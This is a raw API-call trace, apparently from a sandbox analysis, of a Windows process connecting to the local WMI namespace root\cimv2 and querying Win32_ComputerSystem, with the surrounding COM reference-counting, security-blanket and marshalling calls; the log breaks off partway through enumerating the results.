	[0267.214] WbemLocator:IUnknown:Release (This=0x626dee8) returned 0x2
	[0267.214] WbemLocator:IUnknown:Release (This=0x626dcc8) returned 0x0
	[0267.214] WbemLocator:IUnknown:Release (This=0x626dee8) returned 0x1
	[0267.214] CoGetContextToken (in: pToken=0x5eae634 | out: pToken=0x5eae634) returned 0x0
	[0267.214] CoGetContextToken (in: pToken=0x5eae5f4 | out: pToken=0x5eae5f4) returned 0x0
	[0267.214] WbemLocator:IUnknown:AddRef (This=0x626dee8) returned 0x2
	[0267.214] WbemLocator:IUnknown:QueryInterface (in: This=0x626dee8, riid=0x5eae670*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x5eae66c | out: ppvObject=0x5eae66c*=0x626dee8) returned 0x0
	[0267.215] WbemLocator:IUnknown:Release (This=0x626dee8) returned 0x2
	[0267.215] WbemLocator:IUnknown:Release (This=0x626dee8) returned 0x1
	[0267.215] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x62750b0, puCount=0x5eae864 | out: puCount=0x5eae864*=0x2) returned 0x0
	[0267.215] WbemDefPath:IWbemPath:GetText (in: This=0x62750b0, lFlags=8, puBuffLength=0x5eae860*=0x0, pszText=0x0 | out: puBuffLength=0x5eae860*=0x17, pszText=0x0) returned 0x0
	[0267.215] WbemDefPath:IWbemPath:GetText (in: This=0x62750b0, lFlags=8, puBuffLength=0x5eae860*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae860*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0267.215] CoCreateInstance (in: rclsid=0x6a3113a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6a3112d0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x5eae33c | out: ppv=0x5eae33c*=0x626def8) returned 0x0
	[0267.215] WbemLocator:IWbemLocator:ConnectServer (in: This=0x626def8, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x5eae388 | out: ppNamespace=0x5eae388*=0x626e99c) returned 0x0
	[0267.328] WbemLocator:IUnknown:QueryInterface (in: This=0x626e99c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae258 | out: ppvObject=0x5eae258*=0x3ba56c) returned 0x0
	[0267.328] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x3ba56c, pProxy=0x626e99c, pAuthnSvc=0x5eae2a0, pAuthzSvc=0x5eae29c, pServerPrincName=0x5eae2ac, pAuthnLevel=0x5eae2a4, pImpLevel=0x5eae290, pAuthInfo=0x5eae294, pCapabilites=0x5eae298 | out: pAuthnSvc=0x5eae2a0*=0xa, pAuthzSvc=0x5eae29c*=0x0, pServerPrincName=0x5eae2ac, pAuthnLevel=0x5eae2a4*=0x6, pImpLevel=0x5eae290*=0x2, pAuthInfo=0x5eae294, pCapabilites=0x5eae298*=0x1) returned 0x0
	[0267.328] WbemLocator:IUnknown:Release (This=0x3ba56c) returned 0x1
	[0267.328] WbemLocator:IUnknown:QueryInterface (in: This=0x626e99c, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae24c | out: ppvObject=0x5eae24c*=0x3ba58c) returned 0x0
	[0267.328] WbemLocator:IUnknown:QueryInterface (in: This=0x626e99c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae248 | out: ppvObject=0x5eae248*=0x3ba56c) returned 0x0
	[0267.328] WbemLocator:IClientSecurity:SetBlanket (This=0x3ba56c, pProxy=0x626e99c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0267.329] WbemLocator:IUnknown:Release (This=0x3ba56c) returned 0x2
	[0267.329] WbemLocator:IUnknown:Release (This=0x3ba58c) returned 0x1
	[0267.329] CoTaskMemFree (pv=0x3ace40) 
	[0267.329] WbemLocator:IUnknown:Release (This=0x626def8) returned 0x0
	[0267.329] WbemLocator:IUnknown:QueryInterface (in: This=0x626e99c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadc08 | out: ppvObject=0x5eadc08*=0x3ba58c) returned 0x0
	[0267.329] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba58c, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5eadbc4 | out: ppvObject=0x5eadbc4*=0x0) returned 0x80004002
	[0267.332] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba58c, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5eadab8 | out: ppvObject=0x5eadab8*=0x0) returned 0x80004002
	[0267.333] WbemLocator:IUnknown:AddRef (This=0x3ba58c) returned 0x3
	[0267.333] CoGetContextToken (in: pToken=0x5eada50 | out: pToken=0x5eada50) returned 0x0
	[0267.333] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba58c, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eada38 | out: ppvObject=0x5eada38*=0x3ba4ec) returned 0x0
	[0267.333] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x3ba4ec, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5eada40 | out: pCid=0x5eada40*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0267.333] WbemLocator:IUnknown:Release (This=0x3ba4ec) returned 0x3
	[0267.334] CoGetContextToken (in: pToken=0x5eada48 | out: pToken=0x5eada48) returned 0x0
	[0267.334] WbemLocator:IUnknown:AddRef (This=0x3ba58c) returned 0x4
	[0267.334] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba58c, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadabc | out: ppvObject=0x5eadabc*=0x3ba574) returned 0x0
	[0267.334] WbemLocator:IUnknown:Release (This=0x3ba58c) returned 0x4
	[0267.334] WbemLocator:IRpcOptions:Query (in: This=0x3ba574, pPrx=0x3ba58c, dwProperty=2, pdwValue=0x5eadae0 | out: pdwValue=0x5eadae0) returned 0x80004002
	[0267.334] WbemLocator:IUnknown:Release (This=0x3ba574) returned 0x3
	[0267.334] WbemLocator:IUnknown:Release (This=0x3ba58c) returned 0x2
	[0267.335] CoGetContextToken (in: pToken=0x5eadebc | out: pToken=0x5eadebc) returned 0x0
	[0267.335] CoGetContextToken (in: pToken=0x5eade7c | out: pToken=0x5eade7c) returned 0x0
	[0267.335] WbemLocator:IUnknown:AddRef (This=0x3ba58c) returned 0x3
	[0267.335] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba58c, riid=0x5eadef8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x5eadef4 | out: ppvObject=0x5eadef4*=0x626e99c) returned 0x0
	[0267.335] WbemLocator:IUnknown:Release (This=0x3ba58c) returned 0x3
	[0267.335] WbemLocator:IUnknown:Release (This=0x626e99c) returned 0x2
	[0267.335] WbemLocator:IUnknown:Release (This=0x626e99c) returned 0x1
	[0267.335] CoGetContextToken (in: pToken=0x5eae7d8 | out: pToken=0x5eae7d8) returned 0x0
	[0267.335] WbemLocator:IUnknown:AddRef (This=0x3ba58c) returned 0x2
	[0267.336] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba58c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae3fc | out: ppvObject=0x5eae3fc*=0x3ba58c) returned 0x0
	[0267.336] WbemLocator:IUnknown:Release (This=0x3ba58c) returned 0x2
	[0267.336] WbemLocator:IUnknown:Release (This=0x3ba58c) returned 0x1
	[0267.336] CoGetContextToken (in: pToken=0x5eadfdc | out: pToken=0x5eadfdc) returned 0x0
	[0267.336] CoGetContextToken (in: pToken=0x5eadf9c | out: pToken=0x5eadf9c) returned 0x0
	[0267.336] WbemLocator:IUnknown:AddRef (This=0x3ba58c) returned 0x2
	[0267.336] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba58c, riid=0x5eae018*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x5eae014 | out: ppvObject=0x5eae014*=0x626e99c) returned 0x0
	[0267.336] WbemLocator:IUnknown:Release (This=0x3ba58c) returned 0x2
	[0267.337] WbemLocator:IUnknown:AddRef (This=0x626e99c) returned 0x3
	[0267.337] IWbemServices:ExecQuery (in: This=0x626e99c, strQueryLanguage="WQL", strQuery="select * from Win32_ComputerSystem", lFlags=16, pCtx=0x0, ppEnum=0x5eae620 | out: ppEnum=0x5eae620*=0x626ea3c) returned 0x0
	[0267.350] IUnknown:QueryInterface (in: This=0x626ea3c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae2cc | out: ppvObject=0x5eae2cc*=0x626ea40) returned 0x0
	[0267.351] IClientSecurity:QueryBlanket (in: This=0x626ea40, pProxy=0x626ea3c, pAuthnSvc=0x5eae314, pAuthzSvc=0x5eae310, pServerPrincName=0x5eae320, pAuthnLevel=0x5eae318, pImpLevel=0x5eae304, pAuthInfo=0x5eae308, pCapabilites=0x5eae30c | out: pAuthnSvc=0x5eae314*=0xa, pAuthzSvc=0x5eae310*=0x0, pServerPrincName=0x5eae320, pAuthnLevel=0x5eae318*=0x6, pImpLevel=0x5eae304*=0x2, pAuthInfo=0x5eae308, pCapabilites=0x5eae30c*=0x1) returned 0x0
	[0267.351] IUnknown:Release (This=0x626ea40) returned 0x1
	[0267.351] IUnknown:QueryInterface (in: This=0x626ea3c, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae2c0 | out: ppvObject=0x5eae2c0*=0x3ba49c) returned 0x0
	[0267.351] IUnknown:QueryInterface (in: This=0x626ea3c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae2bc | out: ppvObject=0x5eae2bc*=0x626ea40) returned 0x0
	[0267.351] IClientSecurity:SetBlanket (This=0x626ea40, pProxy=0x626ea3c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0267.361] IUnknown:Release (This=0x626ea40) returned 0x2
	[0267.361] WbemLocator:IUnknown:Release (This=0x3ba49c) returned 0x1
	[0267.361] CoTaskMemFree (pv=0x3acd50) 
	[0267.361] WbemLocator:IUnknown:Release (This=0x626e99c) returned 0x2
	[0267.361] IUnknown:QueryInterface (in: This=0x626ea3c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadc78 | out: ppvObject=0x5eadc78*=0x3ba49c) returned 0x0
	[0267.362] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba49c, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5eadc34 | out: ppvObject=0x5eadc34*=0x0) returned 0x80004002
	[0267.364] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba49c, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5eadb28 | out: ppvObject=0x5eadb28*=0x0) returned 0x80004002
	[0267.365] WbemLocator:IUnknown:AddRef (This=0x3ba49c) returned 0x3
	[0267.365] CoGetContextToken (in: pToken=0x5eadac0 | out: pToken=0x5eadac0) returned 0x0
	[0267.365] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba49c, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadaa8 | out: ppvObject=0x5eadaa8*=0x3ba3fc) returned 0x0
	[0267.366] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x3ba3fc, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5eadab0 | out: pCid=0x5eadab0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0267.366] WbemLocator:IUnknown:Release (This=0x3ba3fc) returned 0x3
	[0267.366] CoGetContextToken (in: pToken=0x5eadab8 | out: pToken=0x5eadab8) returned 0x0
	[0267.366] WbemLocator:IUnknown:AddRef (This=0x3ba49c) returned 0x4
	[0267.366] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba49c, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadb2c | out: ppvObject=0x5eadb2c*=0x3ba484) returned 0x0
	[0267.366] WbemLocator:IUnknown:Release (This=0x3ba49c) returned 0x4
	[0267.366] WbemLocator:IRpcOptions:Query (in: This=0x3ba484, pPrx=0x3ba49c, dwProperty=2, pdwValue=0x5eadb50 | out: pdwValue=0x5eadb50) returned 0x80004002
	[0267.366] WbemLocator:IUnknown:Release (This=0x3ba484) returned 0x3
	[0267.367] WbemLocator:IUnknown:Release (This=0x3ba49c) returned 0x2
	[0267.367] CoGetContextToken (in: pToken=0x5eadf2c | out: pToken=0x5eadf2c) returned 0x0
	[0267.367] CoGetContextToken (in: pToken=0x5eadeec | out: pToken=0x5eadeec) returned 0x0
	[0267.367] WbemLocator:IUnknown:AddRef (This=0x3ba49c) returned 0x3
	[0267.367] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba49c, riid=0x5eadf68*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5eadf64 | out: ppvObject=0x5eadf64*=0x626ea3c) returned 0x0
	[0267.367] WbemLocator:IUnknown:Release (This=0x3ba49c) returned 0x3
	[0267.367] IUnknown:Release (This=0x626ea3c) returned 0x2
	[0267.367] IUnknown:Release (This=0x626ea3c) returned 0x1
	[0267.367] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x62750b0, puCount=0x5eae8b8 | out: puCount=0x5eae8b8*=0x2) returned 0x0
	[0267.368] WbemDefPath:IWbemPath:GetText (in: This=0x62750b0, lFlags=4, puBuffLength=0x5eae8b4*=0x0, pszText=0x0 | out: puBuffLength=0x5eae8b4*=0x17, pszText=0x0) returned 0x0
	[0267.368] WbemDefPath:IWbemPath:GetText (in: This=0x62750b0, lFlags=4, puBuffLength=0x5eae8b4*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae8b4*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0267.368] CoGetContextToken (in: pToken=0x5eae254 | out: pToken=0x5eae254) returned 0x0
	[0267.368] CoGetContextToken (in: pToken=0x5eae214 | out: pToken=0x5eae214) returned 0x0
	[0267.368] WbemLocator:IUnknown:AddRef (This=0x3ba49c) returned 0x2
	[0267.368] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba49c, riid=0x5eae290*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5eae28c | out: ppvObject=0x5eae28c*=0x626ea3c) returned 0x0
	[0267.368] WbemLocator:IUnknown:Release (This=0x3ba49c) returned 0x2
	[0267.368] IUnknown:AddRef (This=0x626ea3c) returned 0x3
	[0267.368] IEnumWbemClassObject:Clone (in: This=0x626ea3c, ppEnum=0x5eae888 | out: ppEnum=0x5eae888*=0x626eb04) returned 0x0
	[0267.374] IUnknown:QueryInterface (in: This=0x626eb04, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae544 | out: ppvObject=0x5eae544*=0x626eb08) returned 0x0
	[0267.374] IClientSecurity:QueryBlanket (in: This=0x626eb08, pProxy=0x626eb04, pAuthnSvc=0x5eae58c, pAuthzSvc=0x5eae588, pServerPrincName=0x5eae598, pAuthnLevel=0x5eae590, pImpLevel=0x5eae57c, pAuthInfo=0x5eae580, pCapabilites=0x5eae584 | out: pAuthnSvc=0x5eae58c*=0xa, pAuthzSvc=0x5eae588*=0x0, pServerPrincName=0x5eae598, pAuthnLevel=0x5eae590*=0x6, pImpLevel=0x5eae57c*=0x2, pAuthInfo=0x5eae580, pCapabilites=0x5eae584*=0x1) returned 0x0
	[0267.374] IUnknown:Release (This=0x626eb08) returned 0x1
	[0267.374] IUnknown:QueryInterface (in: This=0x626eb04, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae538 | out: ppvObject=0x5eae538*=0x3ba76c) returned 0x0
	[0267.374] IUnknown:QueryInterface (in: This=0x626eb04, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae534 | out: ppvObject=0x5eae534*=0x626eb08) returned 0x0
	[0267.374] IClientSecurity:SetBlanket (This=0x626eb08, pProxy=0x626eb04, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0267.378] IUnknown:Release (This=0x626eb08) returned 0x2
	[0267.378] WbemLocator:IUnknown:Release (This=0x3ba76c) returned 0x1
	[0267.378] CoTaskMemFree (pv=0x3ace40) 
	[0267.378] IUnknown:Release (This=0x626ea3c) returned 0x2
	[0267.378] IUnknown:QueryInterface (in: This=0x626eb04, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadee0 | out: ppvObject=0x5eadee0*=0x3ba76c) returned 0x0
	[0267.378] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba76c, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5eade9c | out: ppvObject=0x5eade9c*=0x0) returned 0x80004002
	[0267.380] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba76c, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5eadd90 | out: ppvObject=0x5eadd90*=0x0) returned 0x80004002
	[0267.381] WbemLocator:IUnknown:AddRef (This=0x3ba76c) returned 0x3
	[0267.381] CoGetContextToken (in: pToken=0x5eadd28 | out: pToken=0x5eadd28) returned 0x0
	[0267.381] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba76c, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadd10 | out: ppvObject=0x5eadd10*=0x3ba6cc) returned 0x0
	[0267.382] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x3ba6cc, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5eadd18 | out: pCid=0x5eadd18*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0267.382] WbemLocator:IUnknown:Release (This=0x3ba6cc) returned 0x3
	[0267.382] CoGetContextToken (in: pToken=0x5eadd20 | out: pToken=0x5eadd20) returned 0x0
	[0267.382] WbemLocator:IUnknown:AddRef (This=0x3ba76c) returned 0x4
	[0267.382] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba76c, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadd94 | out: ppvObject=0x5eadd94*=0x3ba754) returned 0x0
	[0267.382] WbemLocator:IUnknown:Release (This=0x3ba76c) returned 0x4
	[0267.382] WbemLocator:IRpcOptions:Query (in: This=0x3ba754, pPrx=0x3ba76c, dwProperty=2, pdwValue=0x5eaddb8 | out: pdwValue=0x5eaddb8) returned 0x80004002
	[0267.382] WbemLocator:IUnknown:Release (This=0x3ba754) returned 0x3
	[0267.382] WbemLocator:IUnknown:Release (This=0x3ba76c) returned 0x2
	[0267.383] CoGetContextToken (in: pToken=0x5eae194 | out: pToken=0x5eae194) returned 0x0
	[0267.383] CoGetContextToken (in: pToken=0x5eae154 | out: pToken=0x5eae154) returned 0x0
	[0267.383] WbemLocator:IUnknown:AddRef (This=0x3ba76c) returned 0x3
	[0267.383] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba76c, riid=0x5eae1d0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5eae1cc | out: ppvObject=0x5eae1cc*=0x626eb04) returned 0x0
	[0267.383] WbemLocator:IUnknown:Release (This=0x3ba76c) returned 0x3
	[0267.383] IUnknown:Release (This=0x626eb04) returned 0x2
	[0267.383] IUnknown:Release (This=0x626eb04) returned 0x1
	[0267.383] CoGetContextToken (in: pToken=0x5eae788 | out: pToken=0x5eae788) returned 0x0
	[0267.383] CoGetContextToken (in: pToken=0x5eae748 | out: pToken=0x5eae748) returned 0x0
	[0267.383] WbemLocator:IUnknown:AddRef (This=0x3ba76c) returned 0x2
	[0267.383] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba76c, riid=0x5eae7c4*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5eae7c0 | out: ppvObject=0x5eae7c0*=0x626eb04) returned 0x0
	[0267.383] WbemLocator:IUnknown:Release (This=0x3ba76c) returned 0x2
	[0267.383] IUnknown:AddRef (This=0x626eb04) returned 0x3
	[0267.383] IEnumWbemClassObject:Reset (This=0x626eb04) returned 0x0
	[0267.387] IUnknown:Release (This=0x626eb04) returned 0x2
	[0267.387] CoGetContextToken (in: pToken=0x5eae67c | out: pToken=0x5eae67c) returned 0x0
	[0267.387] IUnknown:AddRef (This=0x626eb04) returned 0x3
	[0267.387] IEnumWbemClassObject:Next (in: This=0x626eb04, lTimeout=-1, uCount=0x1, apObjects=0x38ef70, puReturned=0x30ab42c | out: apObjects=0x38ef70*=0x626eb40, puReturned=0x30ab42c*=0x1) returned 0x0
	[0267.389] IUnknown:QueryInterface (in: This=0x626eb40, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadc88 | out: ppvObject=0x5eadc88*=0x626eb40) returned 0x0
	[0267.389] IUnknown:QueryInterface (in: This=0x626eb40, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5eadc44 | out: ppvObject=0x5eadc44*=0x0) returned 0x80004002
	[0267.390] IUnknown:QueryInterface (in: This=0x626eb40, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5eadb38 | out: ppvObject=0x5eadb38*=0x0) returned 0x80004002
	[0267.390] IUnknown:AddRef (This=0x626eb40) returned 0x3
	[0267.390] CoGetContextToken (in: pToken=0x5eadad0 | out: pToken=0x5eadad0) returned 0x0
	[0267.390] IUnknown:QueryInterface (in: This=0x626eb40, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadab8 | out: ppvObject=0x5eadab8*=0x626eb44) returned 0x0
	[0267.390] IMarshal:GetUnmarshalClass (in: This=0x626eb44, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5eadac0 | out: pCid=0x5eadac0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0
